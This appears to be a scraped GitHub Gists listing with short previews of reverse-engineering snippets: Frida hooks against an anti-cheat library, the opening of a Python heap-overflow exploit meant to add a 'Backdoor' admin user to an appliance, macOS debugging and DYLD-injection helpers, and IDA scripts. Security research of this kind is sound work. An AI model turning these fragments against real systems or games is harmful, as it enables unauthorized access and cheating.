Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import "frida-il2cpp-bridge"; | |
function main() { | |
const AssemblyCSharp = Il2Cpp.domain.assembly("Assembly-CSharp").image; | |
// Note that on versions older than 2.x.y this isn't needed | |
// Since ACTk bundled directly into Assembly-CSharp | |
const ACTk_Runtime = Il2Cpp.domain.assembly("ACTk.Runtime").image; | |
// Target class | |
const PlayerData = AssemblyCSharp.class("PlayerData"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket, struct, sys | |
p32 = lambda x: struct.pack(">I", x) | |
p16 = lambda x: struct.pack(">h", x) | |
p8 = lambda x: struct.pack(">b", x) | |
# ASMP heap overflow exploit creates new applianceAdmin user | |
def exploit(hostname, username="Backdoor", password="Backdoor"): | |
global socks # python closes out of scope sockets | |
port = 3211 # this is hardcoded in the binary | |
print(f"[*] Exploiting ASMP on {hostname} port {port}") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <spawn.h> | |
#include <sys/wait.h> | |
#include <string.h> | |
/* ASLR disabling magic constant from Apple LLDB source code | |
https://opensource.apple.com/source/lldb/lldb-76/tools/darwin-debug/darwin-debug.cpp | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
summary: drawing custom graphs | |
description: | |
Showing custom graphs, using `ida_graph.GraphViewer`. In addition, | |
show how to write actions that can be performed on those. | |
keywords: graph, actions | |
""" | |
from __future__ import print_function | |
# ----------------------------------------------------------------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from idautils import Segments, Functions, XrefsTo, XrefTypeName | |
from idc import get_segm_name, get_segm_end | |
class Dictionary(dict): | |
def add(self, key, value): | |
self[key] = value | |
xref_dict = Dictionary() | |
for segea in Segments(): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package io.github.a13e300.demo.maho | |
import android.app.PendingIntent | |
import android.content.BroadcastReceiver | |
import android.content.Context | |
import android.content.Intent | |
import android.content.IntentFilter | |
import android.content.pm.PackageInstaller | |
import android.content.pm.PackageInstaller.EXTRA_STATUS | |
import android.content.pm.PackageInstaller.STATUS_PENDING_USER_ACTION |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *] | |
-> % sudo taskinfo 'Deliveries Widget' | |
process: "Deliveries Widget" [30145] [unique ID: 1220404] | |
architecture: arm64 | |
coalition (type 0) ID: 105936 | |
coalition (type 1) ID: 591 | |
suspend count: 1 | |
virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB | |
run time: 42 s | |
user/system time (current threads): 0.046565 s / 0.036279 s |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /bin/bash | |
# Simple Utility Script for allowing debug of hardened macOS apps. | |
# This is useful mostly for plug-in developer that would like keep developing without turning SIP off. | |
# Credit for idea goes to (McMartin): https://forum.juce.com/t/apple-gatekeeper-notarised-distributables/29952/57?u=ttg | |
# Update 2022-03-10: Based on Fabian's feedback, add capability to inject DYLD for sanitizers. | |
# | |
# Please note: | |
# - Modern Logic (on M1s) uses `AUHostingService` which resides within the system thus not patchable and REQUIRES to turn-off SIP. | |
# - Some hosts uses separate plug-in scanning or sandboxing. | |
# if that's the case, it's required to patch those (if needed) and attach debugger to them instead. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// dump classes and selectors forbidden in NSPredicates | |
// `cc -framework Foundation -o restricted restricted.m` | |
#import <Foundation/Foundation.h> | |
#import <dlfcn.h> | |
int main() { | |
void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0); | |
NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses"); | |
NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors"); | |
NSLog(@"Restricted Selectors: %@", RestrictedSelectors()); |
NewerOlder